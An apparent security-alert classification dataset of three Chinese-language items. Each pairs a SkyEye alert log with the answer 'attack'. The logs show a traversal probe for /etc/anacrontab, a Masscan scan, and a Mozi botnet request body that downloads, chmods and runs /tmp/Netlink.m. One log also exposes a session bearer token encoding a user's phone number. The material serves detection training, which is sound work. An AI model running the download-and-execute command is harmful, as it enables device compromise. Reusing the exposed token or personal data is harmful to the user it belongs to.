instruction
stringclasses 1
value | input
stringlengths 2.79k
12.9k
| output
stringclasses 2
values |
---|---|---|
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732722399", "rule_version_str": "3.0.1122.14572", "dip_group": "省公司", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732722399, "vuln_harm": "服务器敏感信息一旦泄露会导致攻击者获得重要信息,增加攻击成功率。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.192.209", "site_app": "", "hit_end": 0, "uri": "/gateway/support/oss/getPublicInputStream?filePath=/etc/anacrontab", "dport": 473, "vuln_name": "敏感信息扫描(机器学习)", "rsp_status": 200, "code_language": "", "solution": "请确认服务器是否存在相关文件,如果存在,可考虑迁移或删除敏感信息文件。", "hit_start": 0, "detail_info": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "xff": "", "sip": "183.209.50.59", "vuln_desc": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "public_date": "2020-11-25 19:44:12", "sport": 36228}, "detail_info": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "zhny.hn.sgcc.com.cn/gateway/support/oss/getPublicInputStream", "first_access_time": "2024-11-27 23:46:39", "hazard_level": "2", "cookie": "sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%22191d59a55edcf2-05bd8f349acb414-26001e51-2073600-191d59a55eef89%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%2C%22%24latest_referrer%22%3A%22%22%2C%22%24latest_referrer_host%22%3A%22%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMTkxZDU5YTU1ZWRjZjItMDViZDhmMzQ5YWNiNDE0LTI2MDAxZTUxLTIwNzM2MDAtMTkxZDU5YTU1ZWVmODkifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%221935eec21f6967-011a48e8b28415-26001151-2073600-1935eec21f814be%22%7D; access_token=Bearer%20eyJhbGciOiJIUzUxMiJ9.eyJzeXNUeXBlIjoiWkhOWV9XRUIiLCJhdXRob3JpdGllc1NldCI6WyIwMjE4Il0sImZpcnN0TG9naW4iOmZhbHNlLCJsb2dpblR5cGUiOiJVU0VSTkFNRV9QV0QiLCJyb2xlcyI6IiIsInNvdXJjZSI6IjAxIiwicm9sZXNTZXQiOltdLCJlbmFibGVkIjoxLCJ0b2tlbktleSI6ImFzYWZhZmYuMjAyNDExMjcwMDUwMDQ3MDMiLCJleHBpcmVkIjowLCJsb2dpblRpbWUiOjE3MzI2Mzk4MDQ3MDMsInVzZXJTdGF0ZSI6MSwiaWQiOjIwMDMwMjk5LCJsb2NrZWQiOjAsImlhdCI6MTczMjYzOTgwNCwiZ3JvdXBDb2RlIjoiMDIxOCIsImlzU2VydmljZVN0YXRpb24iOjAsImlzQ2hpbGRVc2VyIjpmYWxzZSwiYXV0aG9yaXRpZXNHQSI6W3siYXV0aG9yaXR5IjoiMDIxOCJ9XSwicHJvdG9jb2xTaWduIjoiMSIsImF1dGhvcml0aWVzIjoiMDIxOCIsImhvbWVSb3V0ZXIiOiIvc3lzU2V0dGluZy9wZXJzb25hbENlbnRlciIsInBob25lIjoiMTgwNjE4NDM5MjciLCJ1c2VyVHlwZSI6MCwicHdkRXhwaXJhdGlvblRpbWUiOjE3MzczMDA1NTIwMDAsInVzZXJuYW1lIjoiYXNhZmFmZiJ9.OqXAUbMFHWOcZ56OrQVcgKnQOVjLMSv4hof5lH_JKvrmqCN8QJK0407KxtQJttJ4ZTKH7NBTk6vFNiNwVFRDLQ; uuid=20030299", "hazard_rating": "低危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--江苏省--南京市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "device_ip": "172.31.191.7", "alarm_source": "天眼分析平台-8", "vuln_name": "敏感信息扫描(机器学习)", "alarm_sip": "172.31.192.209", "skyeye_index": "", "sip_ioc_dip": "17723502529a7dc0b6f137d092be2e56", "xff": "", "vuln_desc": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "attack_chain": "0x01010000", "vuln_harm": "服务器敏感信息一旦泄露会导致攻击者获得重要信息,增加攻击成功率。", "sec-fetch-user": "?1", "dport": "473", "alert_devip": "172.31.191.8", "update_time": "1732722338", "code_language": "", "sec-ch-ua-mobile": "?0", "public_date": "2020-11-25 19:44:12", "skyeye_serial_num": "QbJK/jYtc", "sec-fetch-mode": "navigate", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/gateway/support/oss/getPublicInputStream?filePath=/etc/anacrontab", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6a", "sec-ch-ua": "\"Chromium\";v=\"128\", \"Not;A=Brand\";v=\"24\", \"Google Chrome\";v=\"128\"", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "183.209.50.59", "host_md5": "8264552e08a54b43da4a95c89edc9c8b", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36", "sec-fetch-dest": "document", "vlan_id": "", "vuln_type": "敏感信息扫描(机器学习)", "attack_type": "敏感信息/重要文件泄漏", "is_web_attack": "1", "dip": "172.31.192.209", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请确认服务器是否存在相关文件,如果存在,可考虑迁移或删除敏感信息文件。", "hit_start": "0", "filepath": "/etc/anacrontab", "skyeye_id": "", "payload": {"req_header": "R0VUIC9nYXRld2F5L3N1cHBvcnQvb3NzL2dldFB1YmxpY0lucHV0U3RyZWFtP2ZpbGVQYXRoPS9ldGMvYW5hY3JvbnRhYiBIVFRQLzEuMQ0KSG9zdDogemhueS5obi5zZ2NjLmNvbS5jbg0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0Kc2VjLWNoLXVhOiAiQ2hyb21pdW0iO3Y9IjEyOCIsICJOb3Q7QT1CcmFuZCI7dj0iMjQiLCAiR29vZ2xlIENocm9tZSI7dj0iMTI4Ig0Kc2VjLWNoLXVhLW1vYmlsZTogPzANCnNlYy1jaC11YS1wbGF0Zm9ybTogIldpbmRvd3MiDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTI4LjAuMC4wIFNhZmFyaS81MzcuMzYNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43DQpTZWMtRmV0Y2gtU2l0ZTogbm9uZQ0KU2VjLUZldGNoLU1vZGU6IG5hdmlnYXRlDQpTZWMtRmV0Y2gtVXNlcjogPzENClNlYy1GZXRjaC1EZXN0OiBkb2N1bWVudA0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTix6aDtxPTAuOSxlbjtxPTAuOA0KQ29va2llOiBzZW5zb3JzZGF0YTIwMTVqc3Nka2Nyb3NzPSU3QiUyMmRpc3RpbmN0X2lkJTIyJTNBJTIyMTkxZDU5YTU1ZWRjZjItMDViZDhmMzQ5YWNiNDE0LTI2MDAxZTUxLTIwNzM2MDAtMTkxZDU5YTU1ZWVmODklMjIlMkMlMjJmaXJzdF9pZCUyMiUzQSUyMiUyMiUyQyUyMnByb3BzJTIyJTNBJTdCJTIyJTI0bGF0ZXN0X3RyYWZmaWNfc291cmNlX3R5cGUlMjIlM0ElMjIlRTclOUIlQjQlRTYlOEUlQTUlRTYlQjUlODElRTklODclOEYlMjIlMkMlMjIlMjRsYXRlc3Rfc2VhcmNoX2tleXdvcmQlMjIlM0ElMjIlRTYlOUMlQUElRTUlOEYlOTYlRTUlODglQjAlRTUlODAlQkNfJUU3JTlCJUI0JUU2JThFJUE1JUU2JTg5JTkzJUU1JUJDJTgwJTIyJTJDJTIyJTI0bGF0ZXN0X3JlZmVycmVyJTIyJTNBJTIyJTIyJTJDJTIyJTI0bGF0ZXN0X3JlZmVycmVyX2hvc3QlMjIlM0ElMjIlMjIlN0QlMkMlMjJpZGVudGl0aWVzJTIyJTNBJTIyZXlJa2FXUmxiblJwZEhsZlkyOXZhMmxsWDJsa0lqb2lNVGt4WkRVNVlUVTFaV1JqWmpJdE1EVmlaRGhtTXpRNVlXTmlOREUwTFRJMk1EQXhaVFV4TFRJd056TTJNREF0TVRreFpEVTVZVFUxWldWbU9Ea2lmUSUzRCUzRCUyMiUyQyUyMmhpc3RvcnlfbG9naW5faWQlMjIlM0ElN0IlMjJuYW1lJTIyJTNBJTIyJTIyJTJDJTIydmFsdWUlMjIlM0ElMjIlMjIlN0QlMkMlMjIlMjRkZXZpY2VfaWQlMjIlM0ElMjIxOTM1ZWVjMjFmNjk2Ny0wMTFhNDhlOGIyODQxNS0yNjAwMTE1MS0yMDczNjAwLTE5MzVlZWMyMWY4MTRiZSUyMiU3RDsgYWNjZXNzX3Rva2VuPUJlYXJlciUyMGV5SmhiR2NpT2lKSVV6VXhNaUo5LmV5SnplWE5VZVhCbElqb2lXa2hPV1Y5WFJVSWlMQ0poZFhSb2IzSnBkR2xsYzFObGRDSTZXeUl3TWpFNElsMHNJbVpwY25OMFRHOW5hVzRpT21aaGJITmxMQ0pzYjJkcGJsUjVjR1VpT2lKVlUwVlNUa0ZOUlY5UVYwUWlMQ0p5YjJ4bGN5STZJaUlzSW5OdmRYSmpaU0k2SWpBeElpd2ljbTlzWlhOVFpYUWlPbHRkTENKbGJtRmliR1ZrSWpveExDSjBiMnRsYmt0bGVTSTZJbUZ6WVdaaFptWXVNakF5TkRFeE1qY3dNRFV3TURRM01ETWlMQ0psZUhCcGNtVmtJam93TENKc2IyZHBibFJwYldVaU9qRTNNekkyTXprNE1EUTNNRE1zSW5WelpYSlRkR0YwWlNJNk1Td2lhV1FpT2pJd01ETXdNams1TENKc2IyTnJaV1FpT2pBc0ltbGhkQ0k2TVRjek1qWXpPVGd3TkN3aVozSnZkWEJEYjJSbElqb2lNREl4T0NJc0ltbHpVMlZ5ZG1salpWTjBZWFJwYjI0aU9qQXNJbWx6UTJocGJHUlZjMlZ5SWpwbVlXeHpaU3dpWVhWMGFHOXlhWFJwWlhOSFFTSTZXM3NpWVhWMGFHOXlhWFI1SWpvaU1ESXhPQ0o5WFN3aWNISnZkRzlqYjJ4VGFXZHVJam9pTVNJc0ltRjFkR2h2Y21sMGFXVnpJam9pTURJeE9DSXNJbWh2YldWU2IzVjBaWElpT2lJdmMzbHpVMlYwZEdsdVp5OXdaWEp6YjI1aGJFTmxiblJsY2lJc0luQm9iMjVsSWpvaU1UZ3dOakU0TkRNNU1qY2lMQ0oxYzJWeVZIbHdaU0k2TUN3aWNIZGtSWGh3YVhKaGRHbHZibFJwYldVaU9qRTNNemN6TURBMU5USXdNREFzSW5WelpYSnVZVzFsSWpvaVlYTmhabUZtWmlKOS5PcVhBVWJNRkhXT2NaNTZPclFWY2dLblFPVmpMTVN2NGhvZjVsSF9KS3ZybXFDTjhRSkswNDA3S3h0UUp0dEo0WlRLSDdOQlRrNnZGTmlOd1ZGUkRMUTsgdXVpZD0yMDAzMDI5OQ0KDQo=", "req_body": "", "rsp_header": "SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBXZWQsIDI3IE5vdiAyMDI0IDE1OjQ2OjM5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uO2NoYXJzZXQ9VVRGLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMzcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClZhcnk6IE9yaWdpbg0KVmFyeTogQWNjZXNzLUNvbnRyb2wtUmVxdWVzdC1NZXRob2QNClZhcnk6IEFjY2Vzcy1Db250cm9sLVJlcXVlc3QtSGVhZGVycw0KWC1GcmFtZS1PcHRpb25zOiBBbGxvd0FsbA0KUmVmZXJyZXItUG9saWN5OiBuby1yZWZlcnJlcg0KWC1Eb3dubG9hZC1PcHRpb25zOiBub29wZW4NClN0cmljdC1UcmFuc3BvcnQtU2VjdXJpdHk6IG1heC1hZ2U9MTU1NTIwMDANCkNvbnRlbnQtU2VjdXJpdHktUG9saWN5OiBkZWZhdWx0LXNyYyAnc2VsZicgc3RhdGljNC5zZWd3YXkuY29tKOivpeWcsOWdgOaMiemcgOS/ruaUuSkgJ3Vuc2FmZS1pbmxpbmUnICd1bnNhZmUtZXZhbCcgYmxvYjogZGF0YTogOw0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KWC1YU1MtUHJvdGVjdGlvbjogMTttb2RlPWJsb2NrDQpYLVBlcm1pdHRlZC1Dcm9zcy1Eb21haW4tUG9saWNpZXM6IG5vbmUNCg0K", "rsp_body": "ewoJImNvZGUiOjUwMCwKCSJtZXNzYWdlIjoi6Z2e5rOV6Lev5b6E77yM6K+l5o6l5Y+j5LuF5o+Q5L6bcHVibGlj55uu5b2V5LiL5paH5Lu25rWB6I635Y+WIiwKCSJwYWdlIjpudWxsLAoJInJlc3VsdCI6bnVsbCwKCSJ0aW1lIjpudWxsCn0="}, "host": "zhny.hn.sgcc.com.cn", "host_state": "企图", "accept-language": "zh-CN,zh;q=0.9,en;q=0.8", "rsp_body": "{\n\t\"code\":500,\n\t\"message\":\"非法路径,该接口仅提供public目录下文件流获取\",\n\t\"page\":null,\n\t\"result\":null,\n\t\"time\":null\n}", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_f74d1c21cac0d5abacccd10a1b3ac7ca", "access_time": "2024-11-27 23:46:39", "attack_addr": "中国--江苏省--南京市(32.053245/118.766351)", "sec-fetch-site": "none", "type_chain": "16160000", "dip_addr": "中国--湖南省--长沙市", "rsp_status": "200", "branch_id": "QbJK/fzEi", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "183.209.50.59", "dimension": "3", "url_path": "/gateway/support/oss/getPublicInputStream", "src_mac": "00:24:ac:22:84:33", "file_name": "", "confidence": "高", "rsp_header": "HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 27 Nov 2024 15:46:39 GMT\r\nContent-Type: application/json;charset=UTF-8\r\nContent-Length: 137\r\nConnection: keep-alive\r\nVary: Origin\r\nVary: Access-Control-Request-Method\r\nVary: Access-Control-Request-Headers\r\nX-Frame-Options: AllowAll\r\nReferrer-Policy: no-referrer\r\nX-Download-Options: noopen\r\nStrict-Transport-Security: max-age=15552000\r\nContent-Security-Policy: default-src 'self' static4.segway.com(该地址按需修改) 'unsafe-inline' 'unsafe-eval' blob: data: ;\r\nX-Content-Type-Options: nosniff\r\nX-XSS-Protection: 1;mode=block\r\nX-Permitted-Cross-Domain-Policies: none\r\n\r\n", "super_type": "攻击利用", "serial_num": "QbJK/jYtc", "tcp_option": "", "req_header": "GET /gateway/support/oss/getPublicInputStream?filePath=/etc/anacrontab HTTP/1.1\r\nHost: zhny.hn.sgcc.com.cn\r\nConnection: keep-alive\r\nsec-ch-ua: \"Chromium\";v=\"128\", \"Not;A=Brand\";v=\"24\", \"Google Chrome\";v=\"128\"\r\nsec-ch-ua-mobile: ?0\r\nsec-ch-ua-platform: \"Windows\"\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nSec-Fetch-Site: none\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\nCookie: sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%22191d59a55edcf2-05bd8f349acb414-26001e51-2073600-191d59a55eef89%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%2C%22%24latest_referrer%22%3A%22%22%2C%22%24latest_referrer_host%22%3A%22%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMTkxZDU5YTU1ZWRjZjItMDViZDhmMzQ5YWNiNDE0LTI2MDAxZTUxLTIwNzM2MDAtMTkxZDU5YTU1ZWVmODkifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%221935eec21f6967-011a48e8b28415-26001151-2073600-1935eec21f814be%22%7D; access_token=Bearer%20eyJhbGciOiJIUzUxMiJ9.eyJzeXNUeXBlIjoiWkhOWV9XRUIiLCJhdXRob3JpdGllc1NldCI6WyIwMjE4Il0sImZpcnN0TG9naW4iOmZhbHNlLCJsb2dpblR5cGUiOiJVU0VSTkFNRV9QV0QiLCJyb2xlcyI6IiIsInNvdXJjZSI6IjAxIiwicm9sZXNTZXQiOltdLCJlbmFibGVkIjoxLCJ0b2tlbktleSI6ImFzYWZhZmYuMjAyNDExMjcwMDUwMDQ3MDMiLCJleHBpcmVkIjowLCJsb2dpblRpbWUiOjE3MzI2Mzk4MDQ3MDMsInVzZXJTdGF0ZSI6MSwiaWQiOjIwMDMwMjk5LCJsb2NrZWQiOjAsImlhdCI6MTczMjYzOTgwNCwiZ3JvdXBDb2RlIjoiMDIxOCIsImlzU2VydmljZVN0YXRpb24iOjAsImlzQ2hpbGRVc2VyIjpmYWxzZSwiYXV0aG9yaXRpZXNHQSI6W3siYXV0aG9yaXR5IjoiMDIxOCJ9XSwicHJvdG9jb2xTaWduIjoiMSIsImF1dGhvcml0aWVzIjoiMDIxOCIsImhvbWVSb3V0ZXIiOiIvc3lzU2V0dGluZy9wZXJzb25hbENlbnRlciIsInBob25lIjoiMTgwNjE4NDM5MjciLCJ1c2VyVHlwZSI6MCwicHdkRXhwaXJhdGlvblRpbWUiOjE3MzczMDA1NTIwMDAsInVzZXJuYW1lIjoiYXNhZmFmZiJ9.OqXAUbMFHWOcZ56OrQVcgKnQOVjLMSv4hof5lH_JKvrmqCN8QJK0407KxtQJttJ4ZTKH7NBTk6vFNiNwVFRDLQ; uuid=20030299\r\n\r\n", "req_body": "", "sec-ch-ua-platform": "\"Windows\"", "rule_state": "green", "asset_group": "省公司", "ioc": "268569450-敏感信息扫描(机器学习)", "rule_labels": "{}", "sport": "36228", "h_url": "/gateway/support/oss/getPublicInputStream?filePath=/etc/anacrontab"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732720892", "vlan_id": "", "vuln_type": "Shell命令执行(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732720892, "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.243", "site_app": "", "hit_end": 0, "uri": "/boaform/admin/formLogin?username=ec8&psd=ec8", "dport": 80, "vuln_name": "Shell命令执行(机器学习)", "rsp_status": 0, "code_language": "", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "xff": "", "sip": "117.209.87.214", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "public_date": "2020-11-25 19:51:41", "sport": 34454}, "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9ib2Fmb3JtL2FkbWluL2Zvcm1Mb2dpbj91c2VybmFtZT1lYzgmcHNkPWVjOCBIVFRQLzEuMA0KDQo=", "req_body": "MjBodHRwOi8vJXM6JWQvTW96aS5tJTIwLU8lMjAtPiUyMC90bXAvTmV0bGluay5tO2NobW9kJTIwNzc3JTIwL3RtcC9OZXRsaW5rLm07L3RtcC9OZXRsaW5rLm0md2FuaW5mPTFfSU5URVJORVRfUl9WSURfMTU0IEhUVFAvMS4wDQoNCg==", "rsp_header": "", "rsp_body": ""}, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "file_md5": "", "host": "", "host_state": "失败", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 23:21:32", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "印度--卡纳塔克邦--班加罗尔", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Shell命令执行(机器学习)", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "8b2b9022528f7952784134376ab9e5b5", "proto": "http", "xff": "", "alarm_id": "20241127_00cea921e5f095068f8fa263a9c84c80", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "attack_chain": "0x02020000", "access_time": "2024-11-27 23:21:32", "psd": "ec8", "attack_addr": "印度--卡纳塔克邦--班加罗尔(12.977788/77.607407)", "type_chain": "16090000", "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732720871", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "117.209.87.214", "public_date": "2020-11-25 19:51:41", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/boaform/admin/formLogin", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.0\n\n", "serial_num": "QbJK/8ze/", "uri": "/boaform/admin/formLogin?username=ec8&psd=ec8", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6e", "req_header": "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0\r\n\r\n", "req_body": "20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/tmp/Netlink.m&waninf=1_INTERNET_R_VID_154 HTTP/1.0\r\n\r\n", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "117.209.87.214", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569454-Shell命令执行(机器学习)", "rule_labels": "{}", "host_md5": "d41d8cd98f00b204e9800998ecf8427e", "sport": "34454", "h_url": "/boaform/admin/formLogin?username=ec8&psd=ec8", "username": "ec8"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732720026", "vlan_id": "", "vuln_type": "发现黑客工具Masscan扫描行为", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732720026, "vuln_harm": "攻击者可通过Masscan快速获悉目标端口的状态,并针对开启的端口进行攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "", "hit_end": 39, "uri": "/", "dport": 80, "vuln_name": "发现黑客工具Masscan扫描行为", "rsp_status": 0, "code_language": "", "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵", "hit_start": 19, "detail_info": "Masscan的扫描结果类似于Nmap(一个端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。", "xff": "", "sip": "79.110.62.153", "vuln_desc": "Masscan的扫描结果类似于Nmap(一个端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。", "public_date": "2023-03-17 16:10:28", "sport": 61000}, "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵", "hit_start": "19", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IGl2cmUtbWFzc2Nhbi8xLjMgaHR0cHM6Ly9naXRodWIuY29tL3JvYmVydGRhdmlkZ3JhaGFtLw0KQWNjZXB0OiAqLyoNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Masscan的扫描结果类似于Nmap(一个端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。", "file_md5": "", "host": "", "host_state": "失败", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 23:07:06", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--弗吉尼亚州--阿什本", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现黑客工具Masscan扫描行为", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "05e84db64fa1146b2d43bc83b3c8c5b7", "proto": "http", "xff": "", "alarm_id": "20241127_822406b6afaa6c98294a31aeb30f3195", "vuln_desc": "Masscan的扫描结果类似于Nmap(一个端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。", "attack_chain": "0x01010000", "access_time": "2024-11-27 23:07:06", "attack_addr": "美国--弗吉尼亚州--阿什本(39.043640/-77.487270)", "type_chain": "140E0000", "vuln_harm": "攻击者可通过Masscan快速获悉目标端口的状态,并针对开启的端口进行攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732720005", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "79.110.62.153", "public_date": "2023-03-17 16:10:28", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "39", "h_proto_version": "HTTP/1.0", "serial_num": "QbJK/8ze/", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020582", "req_header": "GET / HTTP/1.0\r\nUser-Agent: ivre-masscan/1.3 https://github.com/robertdavidgraham/\r\nAccept: */*\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "79.110.62.153", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567938-发现黑客工具Masscan扫描行为", "rule_labels": "{\"0x10080e\": {\"parent_id\": \"0x100800\", \"type\": \"扫描器名称\", \"name\": \"Masscan\", \"parent_name\": \"Web漏洞扫描\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Spider/Spider\", \"hw_type\": \"PC\"}}", "host_md5": "d41d8cd98f00b204e9800998ecf8427e", "sport": "61000", "h_url": "/", "user-agent": "ivre-masscan/1.3 https://github.com/robertdavidgraham/"} | 攻击 |
